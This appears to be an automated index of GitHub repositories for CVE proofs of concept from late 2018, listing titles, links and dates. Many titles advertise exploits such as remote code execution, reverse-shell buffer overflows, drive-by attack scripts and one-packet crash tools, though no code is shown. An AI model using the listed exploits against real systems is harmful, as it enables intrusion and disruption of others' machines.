**Apache Karaf XXE Vulnerability (CVE-2018-11788)** : [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) create time: 2019-01-06T11:01:39Z

**CVE-2009-1330 - Easy RM to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3** : [war4uthor/CVE-2009-1330](https://github.com/war4uthor/CVE-2009-1330) create time: 2019-01-05T17:32:00Z

**no description** : [Villaquiranm/5MMISSI-CVE-2017-1000499](https://github.com/Villaquiranm/5MMISSI-CVE-2017-1000499) create time: 2019-01-05T16:33:08Z

**CVE-2016-4971 Wget 1.18/1.14-13.el7 Client Exploit** : [mbadanoiu/CVE-2016-4971](https://github.com/mbadanoiu/CVE-2016-4971) create time: 2019-01-05T15:50:52Z

**2018-cve** : [qiantu88/2018-cve](https://github.com/qiantu88/2018-cve) create time: 2019-01-05T11:16:38Z

**## 在kali中自动化生成cve-2017-8570的恶意ppsx文件和配置msf监听** : [Drac0nids/CVE-2017-8570](https://github.com/Drac0nids/CVE-2017-8570) create time: 2019-01-03T15:12:39Z

**Bash implementation of CVE-2014-5284** : [mbadanoiu/CVE-2014-5284](https://github.com/mbadanoiu/CVE-2014-5284) create time: 2019-01-02T21:36:33Z

**SEH BO based exploit for Easy Chat Server on Win 7 32b** : [adenkiewicz/CVE-2017-9544](https://github.com/adenkiewicz/CVE-2017-9544) create time: 2019-01-02T09:08:58Z

**Exploiting The CVE-2018-19788 PolicyKit Bug** : [jhlongjr/CVE-2018-19788](https://github.com/jhlongjr/CVE-2018-19788) create time: 2018-12-31T16:54:58Z

**some works on CVE-2018-19518** : [ensimag-security/CVE-2018-19518](https://github.com/ensimag-security/CVE-2018-19518) create time: 2018-12-31T16:36:49Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166)** : [avarx/vulnkeys](https://github.com/avarx/vulnkeys) create time: 2018-12-31T16:09:49Z

**CVE-2018-4407,iOS exploit** : [zeng9t/CVE-2018-4407-iOS-exploit](https://github.com/zeng9t/CVE-2018-4407-iOS-exploit) create time: 2018-12-31T08:24:06Z

**no description** : [mekhalleh/cve-2018-6574](https://github.com/mekhalleh/cve-2018-6574) create time: 2018-12-30T22:30:01Z

**Simple exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows 7 32b.** : [adenkiewicz/CVE-2009-1330](https://github.com/adenkiewicz/CVE-2009-1330) create time: 2018-12-30T12:17:08Z

**PoC Exploit iOS 12 to iOS 12.1 (CVE-2018-4431)** : [ktiOSz/PoC_iOS12](https://github.com/ktiOSz/PoC_iOS12) create time: 2018-12-28T17:26:35Z

**CVE-2018-8581** : [qiantu88/CVE-2018-8581](https://github.com/qiantu88/CVE-2018-8581) create time: 2018-12-28T15:47:32Z

**PoC for CVE-2018-20343** : [Alexandre-Bartel/CVE-2018-20343](https://github.com/Alexandre-Bartel/CVE-2018-20343) create time: 2018-12-28T10:49:51Z

**PoC for Foxit Reader CVE-2018-14442** : [payatu/CVE-2018-14442](https://github.com/payatu/CVE-2018-14442) create time: 2018-12-28T08:29:28Z

**A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details.** : [c826/bash-tls-reneg-attack](https://github.com/c826/bash-tls-reneg-attack) create time: 2018-12-27T09:08:07Z

**CVE-2018-8581 | Microsoft Exchange Server Elevation of Privilege Vulnerability** : [WyAtu/CVE-2018-8581](https://github.com/WyAtu/CVE-2018-8581) create time: 2018-12-27T06:30:32Z

**CVE-2018-6574** : [zur250/Zur-Go-GET-RCE-Solution](https://github.com/zur250/Zur-Go-GET-RCE-Solution) create time: 2018-12-25T07:08:55Z

**no description** : [halkichi0308/CVE-2015-9251](https://github.com/halkichi0308/CVE-2015-9251) create time: 2018-12-20T12:12:59Z

**Flash 2018-15982 UAF** : [SyFi/CVE-2018-15982](https://github.com/SyFi/CVE-2018-15982) create time: 2018-12-20T02:40:22Z

**CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2003-0264](https://github.com/war4uthor/CVE-2003-0264) create time: 2018-12-19T22:49:13Z

**CVE-2012-5106 - Freefloat FTP Server Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2012-5106](https://github.com/war4uthor/CVE-2012-5106) create time: 2018-12-19T22:40:51Z

**CVE-2007-1567 - WarFTP 1.65 'USER' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2007-1567](https://github.com/war4uthor/CVE-2007-1567) create time: 2018-12-19T22:02:54Z

**web2py/web2py @ e94946d** : [sj/web2py-e94946d-CVE-2016-3957](https://github.com/sj/web2py-e94946d-CVE-2016-3957) create time: 2018-12-19T16:55:03Z

**LibSSH Authentication Bypass CVE-2018-10933** : [nikhil1232/LibSSH-Authentication-Bypass](https://github.com/nikhil1232/LibSSH-Authentication-Bypass) create time: 2018-12-19T15:33:00Z

**no description** : [Yable/CVE-2018-4878](https://github.com/Yable/CVE-2018-4878) create time: 2018-12-19T13:22:03Z

**https://github.com/milo2012/CVE-2018-0296.git** : [qiantu88/CVE-2018-0296](https://github.com/qiantu88/CVE-2018-0296) create time: 2018-12-19T11:57:43Z

**no description** : [qiantu88/CVE-2018-8120](https://github.com/qiantu88/CVE-2018-8120) create time: 2018-12-19T10:58:55Z

**no description** : [qiantu88/CVE-2017-12617](https://github.com/qiantu88/CVE-2017-12617) create time: 2018-12-19T10:26:33Z

**CVE-2004-2271 - Minishare 1.4.1 HTTP Server Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2004-2271](https://github.com/war4uthor/CVE-2004-2271) create time: 2018-12-19T00:27:20Z

**An implementation of CVE-2009-0689 for the Nintendo Wii.** : [Fullmetal5/str2hax](https://github.com/Fullmetal5/str2hax) create time: 2018-12-18T04:24:43Z

**Leveraging CVE-2018-19788 without root shells** : [Ekultek/PoC](https://github.com/Ekultek/PoC) create time: 2018-12-17T19:26:22Z

**PowerShell script to mitigate CVE-2018-12038. The script takes a list of PC as input, gets their BitLocker encryption type remotely, and outputs a report as a CSV file** : [gdraperi/remote-bitlocker-encryption-report](https://github.com/gdraperi/remote-bitlocker-encryption-report) create time: 2018-12-17T16:02:26Z

**CVE-2018-1270 表达式RCE环境** : [Venscor/CVE-2018-1270](https://github.com/Venscor/CVE-2018-1270) create time: 2018-12-17T02:22:53Z

**no description** : [20matan/CVE-2018-6574-POC](https://github.com/20matan/CVE-2018-6574-POC) create time: 2018-12-16T21:55:27Z

**MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞** : [jas502n/CVE-2018-14847](https://github.com/jas502n/CVE-2018-14847) create time: 2018-12-15T10:38:26Z

**RF-14310 / CVE-2018-12533 - Payload generator** : [TheKalin/CVE-2018-12533](https://github.com/TheKalin/CVE-2018-12533) create time: 2018-12-15T09:08:53Z

**no description** : [alexzorin/poc-cve-2018-16875](https://github.com/alexzorin/poc-cve-2018-16875) create time: 2018-12-14T00:53:46Z

**针对类似CVE-2017-10271漏洞的一个java反序列化漏洞扫描器** : [ETOCheney/JavaDeserialization](https://github.com/ETOCheney/JavaDeserialization) create time: 2018-12-13T02:00:23Z

**Aggressor Script to launch IE driveby for CVE-2018-15982.** : [scanfsec/CVE-2018-15982](https://github.com/scanfsec/CVE-2018-15982) create time: 2018-12-12T04:07:08Z

**CVE-2018-15982_EXP_IE** : [jas502n/CVE-2018-15982_EXP_IE](https://github.com/jas502n/CVE-2018-15982_EXP_IE) create time: 2018-12-12T02:41:31Z

**no description** : [securifera/CVE-2018-16156-Exploit](https://github.com/securifera/CVE-2018-16156-Exploit) create time: 2018-12-11T22:25:22Z

**Just My ports of CVE-2017-8759** : [ChaitanyaHaritash/CVE-2017-8759](https://github.com/ChaitanyaHaritash/CVE-2017-8759) create time: 2018-12-11T21:39:39Z

**Integer Overflow (CyberSecurity | UMCP 2018) . This involves exploiting integer overflow vulnerability present in mem_check function of infiniband Soft RoCE implemetation (Ref: CVE-2016-8636). It also exploring Pwnie Adventure island (Reference: LiveOverflow)** : [jigerjain/Integer-Overflow-test](https://github.com/jigerjain/Integer-Overflow-test) create time: 2018-12-11T20:30:31Z

**Script and metasploit module for CVE-2018-15982** : [kphongagsorn/adobe-flash-cve2018-15982](https://github.com/kphongagsorn/adobe-flash-cve2018-15982) create time: 2018-12-11T16:31:21Z

**CVE-2014-0160** : [Saymeis/HeartBleed](https://github.com/Saymeis/HeartBleed) create time: 2018-12-10T22:42:51Z

**It is a version modified of the original exploit by Muhammad Haidari (https://raw.githubusercontent.com/Muhammd/HP-Power-Manager/master/hpm_exploit.py). The modification includes a payload which allows to obtain a reverse shell to avoid to open ports in the Windows'target which the firewall's windows will be closed it.** : [n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF](https://github.com/n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF) create time: 2018-12-10T19:28:32Z

**Microsoft Equation 3.0/Convert python2 to python3** : [chanbin/CVE-2017-11882](https://github.com/chanbin/CVE-2017-11882) create time: 2018-12-10T11:15:15Z

**exp of CVE-2018-15982** : [Ridter/CVE-2018-15982_EXP](https://github.com/Ridter/CVE-2018-15982_EXP) create time: 2018-12-10T04:53:31Z

**个人整理的Centos7.x + Kubernetes-1.12.3 + Dashboard-1.8.3 无 CVE-2018-1002105 漏洞的master节点全自动快速一键安装部署文件,适用于测试环境,生产环境的快速安装部署** : [imlzw/Kubernetes-1.12.3-all-auto-install](https://github.com/imlzw/Kubernetes-1.12.3-all-auto-install) create time: 2018-12-10T03:14:55Z

**Proof of consept for CVE-2018-17431** : [Fadavvi/CVE-2018-17431-PoC](https://github.com/Fadavvi/CVE-2018-17431-PoC) create time: 2018-12-08T07:47:41Z

**This exploit for CVE 2018-11759, vulnerability in apache mod_jk, module for load-balancer** : [Jul10l1r4/Identificador-CVE-2018-11759](https://github.com/Jul10l1r4/Identificador-CVE-2018-11759) create time: 2018-12-08T02:32:14Z

**no description** : [yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-](https://github.com/yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-) create time: 2018-12-08T00:13:28Z

**Test if your system is vulernable for cve_2018_19788.** : [robertdebock/ansible-role-cve_2018_19788](https://github.com/robertdebock/ansible-role-cve_2018_19788) create time: 2018-12-07T20:53:47Z

**Ansible role to check the vulnerability tracked as CVE-2018-19788, impacts PolicyKit version 0.115 which comes pre-installed on a wide range of Linux distributions** : [d4gh0s7/CVE-2018-19788](https://github.com/d4gh0s7/CVE-2018-19788) create time: 2018-12-07T20:27:01Z

**Silly easy exploit for CVE-2018-19788** : [AbsoZed/CVE-2018-19788](https://github.com/AbsoZed/CVE-2018-19788) create time: 2018-12-07T00:42:35Z

**Unrestricted file upload in Adobe ColdFusion** : [vah13/CVE-2018-15961](https://github.com/vah13/CVE-2018-15961) create time: 2018-12-06T15:47:57Z

**CVE-2018-3252-PoC** : [pyn3rd/CVE-2018-3252](https://github.com/pyn3rd/CVE-2018-3252) create time: 2018-12-06T13:48:53Z

**A reproducible environment with flag challenges for CVE-2016-3714** : [HRSkraps/CVE-2016-3714](https://github.com/HRSkraps/CVE-2016-3714) create time: 2018-12-06T13:23:05Z

**PoC for CVE-2018-1002105.** : [evict/poc_CVE-2018-1002105](https://github.com/evict/poc_CVE-2018-1002105) create time: 2018-12-06T11:28:02Z

**CVE-2018-15982_PoC** : [AirEvan/CVE-2018-15982_PoC](https://github.com/AirEvan/CVE-2018-15982_PoC) create time: 2018-12-06T09:24:47Z

**freeswitch all version remote command execute (cve-2018-19911)** : [iSafeBlue/freeswitch_rce](https://github.com/iSafeBlue/freeswitch_rce) create time: 2018-12-06T05:48:02Z

**Flash sources for CVE-2018-15982 used by NK** : [FlatL1neAPT/CVE-2018-15982](https://github.com/FlatL1neAPT/CVE-2018-15982) create time: 2018-12-05T23:41:37Z

**Test utility for cve-2018-1002105** : [gravitational/cve-2018-1002105](https://github.com/gravitational/cve-2018-1002105) create time: 2018-12-05T02:51:43Z

**no description** : [uzzzval/cve-2004-2167](https://github.com/uzzzval/cve-2004-2167) create time: 2018-12-05T00:43:17Z

**Weblogic(CVE-2017-10271)** : [nhwuxiaojun/CVE-2017-10271](https://github.com/nhwuxiaojun/CVE-2017-10271) create time: 2018-12-04T14:34:10Z

**CVE-2018-19487, CVE-2018-19488, exploit for WordPress wp-jobhunt plugin** : [Antho59/wp-jobhunt-exploit](https://github.com/Antho59/wp-jobhunt-exploit) create time: 2018-12-04T13:36:13Z

**dnsmasq rop exploit with NX bypass** : [pupiles/bof-dnsmasq-cve-2017-14493](https://github.com/pupiles/bof-dnsmasq-cve-2017-14493) create time: 2018-12-04T08:15:53Z

**no description** : [b1ueb0y/CVE-2018-3252](https://github.com/b1ueb0y/CVE-2018-3252) create time: 2018-12-04T03:14:21Z

**CVE-2014-8682** : [nihal1306/gogs](https://github.com/nihal1306/gogs) create time: 2018-12-04T00:40:09Z

**Proof of Concept - RCE Exploitation : Git submodules' names vulnerability - Ensimag November 2018** : [ygouzerh/CVE-2018-11235](https://github.com/ygouzerh/CVE-2018-11235) create time: 2018-12-03T18:50:27Z

**A VENOM (CVE-2015-3456) Exploit / PoC written in C.** : [orf53975/poisonfrog](https://github.com/orf53975/poisonfrog) create time: 2018-12-03T06:15:21Z

**This is an exploitation guide for CVE-2016-2233** : [fath0218/CVE-2016-2233](https://github.com/fath0218/CVE-2016-2233) create time: 2018-12-03T02:55:06Z

**CVE-2014-4511** : [michaelsss1/gitlist-RCE](https://github.com/michaelsss1/gitlist-RCE) create time: 2018-12-03T02:21:29Z

**A collection of code pertaining to CVE-2016-0728 (various authors)** : [sugarvillela/CVE](https://github.com/sugarvillela/CVE) create time: 2018-12-03T00:15:23Z

**CVE-2016-1240 exploit and patch** : [mhe18/CVE_Project](https://github.com/mhe18/CVE_Project) create time: 2018-12-02T19:35:28Z

**CVE-2018-8021 Proof-Of-Concept and Exploit** : [r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021](https://github.com/r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021) create time: 2018-12-02T19:01:17Z

**PrestaShop (1.6.x <= 1.6.1.23 or 1.7.x <= 1.7.4.4) Back Office Remote Code Execution (CVE-2018-19126)** : [farisv/PrestaShop-CVE-2018-19126](https://github.com/farisv/PrestaShop-CVE-2018-19126) create time: 2018-12-01T10:53:45Z

**All about CVE-2018-14667; From what it is to how to successfully exploit it.** : [syriusbughunt/CVE-2018-14667](https://github.com/syriusbughunt/CVE-2018-14667) create time: 2018-11-30T04:06:08Z

**no description** : [lkostick/security_privacy_cve_2018](https://github.com/lkostick/security_privacy_cve_2018) create time: 2018-11-29T15:50:02Z

**no description** : [T1V0h/CVE-2018-4415](https://github.com/T1V0h/CVE-2018-4415) create time: 2018-11-29T14:06:50Z

**no description** : [lol-fi/cve-2011-4862](https://github.com/lol-fi/cve-2011-4862) create time: 2018-11-28T21:13:05Z

**Group Project S&P** : [msharm33/CVE2016-5734](https://github.com/msharm33/CVE2016-5734) create time: 2018-11-28T15:34:24Z

**about CVE-2018-14667 from RichFaces Framework 3.3.4** : [r00t4dm/CVE-2018-14667](https://github.com/r00t4dm/CVE-2018-14667) create time: 2018-11-28T07:35:28Z

**NodeJS + Postgres (Remote Code Execution) 🛰** : [nulldreams/CVE-2017-16082](https://github.com/nulldreams/CVE-2017-16082) create time: 2018-11-27T18:09:17Z

**Exploit of the privilege escalation vulnerability of the WordPress plugin "WP GDPR Compliance" by "Van Ons" (https://de.wordpress.org/plugins/wp-gdpr-compliance/) CVE-2018-19207** : [aeroot/WP-GDPR-Compliance-Plugin-Exploit](https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit) create time: 2018-11-27T14:27:06Z

**iOS 11 WiFi Exploit - icmp_error_CVE-2018-4407** : [soccercab/wifi](https://github.com/soccercab/wifi) create time: 2018-11-26T14:14:55Z

**The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10** : [alt3kx/CVE-2018-7691](https://github.com/alt3kx/CVE-2018-7691) create time: 2018-11-26T13:54:08Z

**The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10** : [alt3kx/CVE-2018-7690](https://github.com/alt3kx/CVE-2018-7690) create time: 2018-11-26T13:52:45Z

**no description** : [Ang-YC/CVE-2017-5007](https://github.com/Ang-YC/CVE-2017-5007) create time: 2018-11-26T11:14:13Z

**CVE-2018-19537** : [JackDoan/TP-Link-ArcherC5-RCE](https://github.com/JackDoan/TP-Link-ArcherC5-RCE) create time: 2018-11-25T23:03:19Z

**RTSPServer Code Execution Vulnerability CVE-2018-4013** : [r3dxpl0it/RTSPServer-Code-Execution-Vulnerability](https://github.com/r3dxpl0it/RTSPServer-Code-Execution-Vulnerability) create time: 2018-11-24T15:49:53Z

**LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018** : [MauroEldritch/lempo](https://github.com/MauroEldritch/lempo) create time: 2018-11-24T06:48:34Z

**no description** : [moajo/cve_2018_11235](https://github.com/moajo/cve_2018_11235) create time: 2018-11-24T06:08:06Z

**Security & Privacy in Computing(Fall 2018), Final Group Project at JHUISI, clamscan vulnerability in Cisco's ClamAV 0.99.3** : [jaychowjingjie/CVE-2018-0202](https://github.com/jaychowjingjie/CVE-2018-0202) create time: 2018-11-24T01:18:52Z

**no description** : [zeroto01/CVE-2018-14667](https://github.com/zeroto01/CVE-2018-14667) create time: 2018-11-23T06:44:49Z

**no description** : [un4ckn0wl3z/CVE-2017-5638](https://github.com/un4ckn0wl3z/CVE-2017-5638) create time: 2018-11-22T04:02:59Z

**libSSH bypass** : [sambiyal/CVE-2018-10933-POC](https://github.com/sambiyal/CVE-2018-10933-POC) create time: 2018-11-21T09:34:12Z

**CVE-2008-0128** : [ngyanch/4062-1](https://github.com/ngyanch/4062-1) create time: 2018-11-20T16:26:21Z

**no description** : [beraphin/CVE-2017-16943](https://github.com/beraphin/CVE-2017-16943) create time: 2018-11-20T09:46:25Z

**no description** : [BradyDonovan/CVE-2018-19592](https://github.com/BradyDonovan/CVE-2018-19592) create time: 2018-11-20T06:51:16Z

**no description** : [tafamace/CVE-2018-7489](https://github.com/tafamace/CVE-2018-7489) create time: 2018-11-19T13:13:27Z

**no description** : [tafamace/CVE-2018-10936](https://github.com/tafamace/CVE-2018-10936) create time: 2018-11-19T13:09:47Z

**no description** : [tafamace/CVE-2018-1324](https://github.com/tafamace/CVE-2018-1324) create time: 2018-11-19T12:46:37Z

**no description** : [tafamace/CVE-2018-1313](https://github.com/tafamace/CVE-2018-1313) create time: 2018-11-19T12:38:21Z

**no description** : [tafamace/CVE-2018-8038](https://github.com/tafamace/CVE-2018-8038) create time: 2018-11-19T12:14:45Z

**no description** : [tafamace/CVE-2018-8039](https://github.com/tafamace/CVE-2018-8039) create time: 2018-11-19T12:08:07Z

**no description** : [tafamace/CVE-2018-1270](https://github.com/tafamace/CVE-2018-1270) create time: 2018-11-19T11:47:40Z

**no description** : [tafamace/CVE-2018-12540](https://github.com/tafamace/CVE-2018-12540) create time: 2018-11-19T11:41:16Z

**no description** : [tafamace/CVE-2018-12537](https://github.com/tafamace/CVE-2018-12537) create time: 2018-11-19T11:18:35Z

**no description** : [tafamace/CVE-2018-12418](https://github.com/tafamace/CVE-2018-12418) create time: 2018-11-19T11:12:00Z

**no description** : [tafamace/CVE-2017-2666](https://github.com/tafamace/CVE-2017-2666) create time: 2018-11-19T10:33:25Z

**no description** : [tafamace/CVE-2017-12624](https://github.com/tafamace/CVE-2017-12624) create time: 2018-11-19T10:07:55Z

**no description** : [tafamace/CVE-2018-13864](https://github.com/tafamace/CVE-2018-13864) create time: 2018-11-19T09:40:47Z

**no description** : [tafamace/CVE-2017-17485](https://github.com/tafamace/CVE-2017-17485) create time: 2018-11-19T09:29:28Z

**no description** : [tafamace/CVE-2018-1259](https://github.com/tafamace/CVE-2018-1259) create time: 2018-11-19T09:25:32Z

**no description** : [tafamace/CVE-2016-6798](https://github.com/tafamace/CVE-2016-6798) create time: 2018-11-19T08:59:42Z

**no description** : [tafamace/CVE-2016-4438](https://github.com/tafamace/CVE-2016-4438) create time: 2018-11-19T08:49:25Z

**no description** : [tafamace/CVE-2016-0793](https://github.com/tafamace/CVE-2016-0793) create time: 2018-11-19T08:40:58Z

**no description** : [tafamace/CVE-2014-8110](https://github.com/tafamace/CVE-2014-8110) create time: 2018-11-19T07:38:20Z

**no description** : [tafamace/CVE-2013-4002](https://github.com/tafamace/CVE-2013-4002) create time: 2018-11-19T07:24:42Z

**no description** : [tafamace/CVE-2012-5575](https://github.com/tafamace/CVE-2012-5575) create time: 2018-11-19T06:08:26Z

**Tool for CVE-2018-16323** : [ttffdd/XBadManners](https://github.com/ttffdd/XBadManners) create time: 2018-11-18T15:30:46Z

**cve-2018-14667 demo** : [nareshmail/cve-2018-14667](https://github.com/nareshmail/cve-2018-14667) create time: 2018-11-18T06:43:46Z

**CVE-2018-16509 (Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities)** : [knqyf263/CVE-2018-16509](https://github.com/knqyf263/CVE-2018-16509) create time: 2018-11-17T12:26:38Z

**Implementation of CVE-2018-10933 with CIDR block scanner** : [Ad1bDaw/libSSH-bypass](https://github.com/Ad1bDaw/libSSH-bypass) create time: 2018-11-16T18:46:28Z

**Use this tool to prioritize cluster patching for the recent VMware advisory VMSA-2018-0027 related to CVE-2018-6981 and CVE-2018-6982.** : [heaphopopotamus/vmxnet3Hunter](https://github.com/heaphopopotamus/vmxnet3Hunter) create time: 2018-11-13T18:47:37Z

**Proof-of-Concept exploit of CVE-2018-19131: Squid Proxy XSS via X.509 Certificate** : [JonathanWilbur/CVE-2018-19131](https://github.com/JonathanWilbur/CVE-2018-19131) create time: 2018-11-13T13:40:10Z

**My first try to code my own LPE exploit.** : [DoubleMice/cve-2017-11176](https://github.com/DoubleMice/cve-2017-11176) create time: 2018-11-13T05:55:03Z

**CVE-2016-4657 web-kit vulnerability for ios 9.3, nintendo switch browser vulnerability** : [vigneshyaadav27/webkit-vulnerability](https://github.com/vigneshyaadav27/webkit-vulnerability) create time: 2018-11-11T14:22:18Z

**PoC code for CVE-2018-9539** : [tamirzb/CVE-2018-9539](https://github.com/tamirzb/CVE-2018-9539) create time: 2018-11-11T14:14:04Z

**Setup, exploit and patch for CVE-2009-4092 Simplog CSRF** : [xiaoyu-iid/Simplog-Exploit](https://github.com/xiaoyu-iid/Simplog-Exploit) create time: 2018-11-10T20:40:32Z

**CMS Made Simple 2.2.7 RCE exploit** : [0x00-0x00/CVE-2018-10517](https://github.com/0x00-0x00/CVE-2018-10517) create time: 2018-11-09T16:09:39Z

**Wordpress plugin Site-Editor v1.1.1 LFI exploit** : [0x00-0x00/CVE-2018-7422](https://github.com/0x00-0x00/CVE-2018-7422) create time: 2018-11-09T14:42:57Z

**PHPMyAdmin v4.8.0 and v.4.8.1 LFI exploit** : [0x00-0x00/CVE-2018-12613](https://github.com/0x00-0x00/CVE-2018-12613) create time: 2018-11-09T14:10:20Z

**no description** : [ab1gale/phpcms-2008-CVE-2018-19127](https://github.com/ab1gale/phpcms-2008-CVE-2018-19127) create time: 2018-11-09T09:51:26Z

**no description** : [matlink/CVE-2018-17456](https://github.com/matlink/CVE-2018-17456) create time: 2018-11-08T14:03:52Z

**no description** : [beraphin/CVE-2018-6789](https://github.com/beraphin/CVE-2018-6789) create time: 2018-11-08T08:25:42Z

**CVE-2017-11882 analyse notebook** : [R0fM1a/IDB_Share](https://github.com/R0fM1a/IDB_Share) create time: 2018-11-08T07:44:32Z

**来自:https://www.freebuf.com/articles/web/31700.html** : [caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC](https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC) create time: 2018-11-08T02:50:28Z

**Crashes any macOS High Sierra or iOS 11 device that is on the same WiFi network** : [anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407](https://github.com/anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407) create time: 2018-11-07T21:41:39Z

**no description** : [dragotime/cve-2018-1000134](https://github.com/dragotime/cve-2018-1000134) create time: 2018-11-07T06:22:47Z

**Exploit for PlaySMS 1.4 authenticated RCE** : [jasperla/CVE-2017-9101](https://github.com/jasperla/CVE-2017-9101) create time: 2018-11-06T19:16:29Z

**an RCE (remote command execution) approach of CVE-2018-7750** : [jm33-m0/CVE-2018-7750](https://github.com/jm33-m0/CVE-2018-7750) create time: 2018-11-06T10:01:13Z

**Check with Maven on CVE-2011-1475** : [samaujs/CVE-2011-1475](https://github.com/samaujs/CVE-2011-1475) create time: 2018-11-06T08:08:07Z

**A buffer overflow vulnerability in the XNU kernel's ICMP error code causes IOS devices to crash (laptops and mobiles).** : [lucagiovagnoli/CVE-2018-4407](https://github.com/lucagiovagnoli/CVE-2018-4407) create time: 2018-11-04T05:10:38Z

**IOS/MAC Denial-Of-Service [POC/EXPLOIT FOR MASSIVE ATTACK TO IOS/MAC IN NETWORK]** : [r3dxpl0it/CVE-2018-4407](https://github.com/r3dxpl0it/CVE-2018-4407) create time: 2018-11-04T01:47:05Z

**Node.js PoC exploit code for CVE-2018-4407** : [SamDecrock/node-cve-2018-4407](https://github.com/SamDecrock/node-cve-2018-4407) create time: 2018-11-02T22:00:17Z

**POC: Heap buffer overflow in the networking code in the XNU operating system kernel** : [zteeed/CVE-2018-4407-IOS](https://github.com/zteeed/CVE-2018-4407-IOS) create time: 2018-11-02T15:26:47Z

**CVE-2018-4407 IOS/macOS kernel crash** : [WyAtu/CVE-2018-4407](https://github.com/WyAtu/CVE-2018-4407) create time: 2018-11-02T08:40:33Z

**Messing Apple devices on the network with CVE-2018-4407 (heap overflow in bad packet handling)** : [farisv/AppleDOS](https://github.com/farisv/AppleDOS) create time: 2018-11-02T08:29:29Z

**CVE-2018-4407 概述與實現** : [s2339956/check_icmp_dos-CVE-2018-4407-](https://github.com/s2339956/check_icmp_dos-CVE-2018-4407-) create time: 2018-11-02T03:38:41Z

**no description** : [bolonobolo/CVE-2018-14665](https://github.com/bolonobolo/CVE-2018-14665) create time: 2018-11-02T01:09:37Z

**PoC Code for CVE-2018-18714 (exploit by stack overflow)** : [DownWithUp/CVE-2018-18714](https://github.com/DownWithUp/CVE-2018-18714) create time: 2018-11-01T20:31:50Z

**no description** : [redirected/cve-2018-6574](https://github.com/redirected/cve-2018-6574) create time: 2018-11-01T18:44:35Z

**Crash macOS and iOS devices with one packet** : [unixpickle/cve-2018-4407](https://github.com/unixpickle/cve-2018-4407) create time: 2018-11-01T17:03:25Z

**no description** : [matlink/CVE-2018-17961](https://github.com/matlink/CVE-2018-17961) create time: 2018-11-01T13:33:12Z

**Proof of concept showing how to exploit the CVE-2018-11759** : [immunIT/CVE-2018-11759](https://github.com/immunIT/CVE-2018-11759) create time: 2018-11-01T09:11:07Z

**iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC** : [Pa55w0rd/check_icmp_dos](https://github.com/Pa55w0rd/check_icmp_dos) create time: 2018-11-01T08:21:59Z

**CVE-2018-8440 standalone exploit** : [sourceincite/CVE-2018-8440](https://github.com/sourceincite/CVE-2018-8440) create time: 2018-10-31T17:00:43Z

**A root tool based on the [CVE-2015-1805 vulnerability](https://access.redhat.com/security/cve/cve-2015-1805) It supports 32 and 64bit, get sys call table address via swi.** : [mobilelinux/iovy_root_research](https://github.com/mobilelinux/iovy_root_research) create time: 2018-10-31T10:26:15Z

**Put the *.py files to test/functional folder of bitcoin sourcecode (commit: 4901c00792c1dabae4bb01e6373c9b1ed9ef3008)** : [hikame/CVE-2018-17144_POC](https://github.com/hikame/CVE-2018-17144_POC) create time: 2018-10-31T09:07:35Z

**Fully functional script for brute forcing SSH and trying credentials - CVE-2018-15473** : [JoeBlackSecurity/SSHUsernameBruter-SSHUB](https://github.com/JoeBlackSecurity/SSHUsernameBruter-SSHUB) create time: 2018-10-31T03:23:46Z

**Exploit code for CVE-2018-9411 for MediaCasService** : [tamirzb/CVE-2018-9411](https://github.com/tamirzb/CVE-2018-9411) create time: 2018-10-30T18:48:20Z

**no description** : [matlink/cve-2017-1000083-atril-nautilus](https://github.com/matlink/cve-2017-1000083-atril-nautilus) create time: 2018-10-30T12:22:41Z

**no description** : [matlink/evince-cve-2017-1000083](https://github.com/matlink/evince-cve-2017-1000083) create time: 2018-10-30T12:18:11Z

**no description** : [ameenudeen/CVE2018](https://github.com/ameenudeen/CVE2018) create time: 2018-10-30T09:31:56Z

**CVE-2018-2628漏洞工具包** : [Lighird/CVE-2018-2628](https://github.com/Lighird/CVE-2018-2628) create time: 2018-10-30T03:26:16Z

**no description** : [kastellanos/CVE-2018-7602](https://github.com/kastellanos/CVE-2018-7602) create time: 2018-10-29T12:08:53Z

**Exploit for vulnerability CVE-2018-6389 on wordpress sites** : [Zazzzles/Wordpress-DOS](https://github.com/Zazzzles/Wordpress-DOS) create time: 2018-10-28T21:05:04Z

**CVE_2017_11882** : [letiencong96/CVE_2017_11882](https://github.com/letiencong96/CVE_2017_11882) create time: 2018-10-27T16:02:01Z

**Cross-site request forgery (CSRF)** : [TSNGL21/CVE-2016-6801](https://github.com/TSNGL21/CVE-2016-6801) create time: 2018-10-27T10:26:41Z

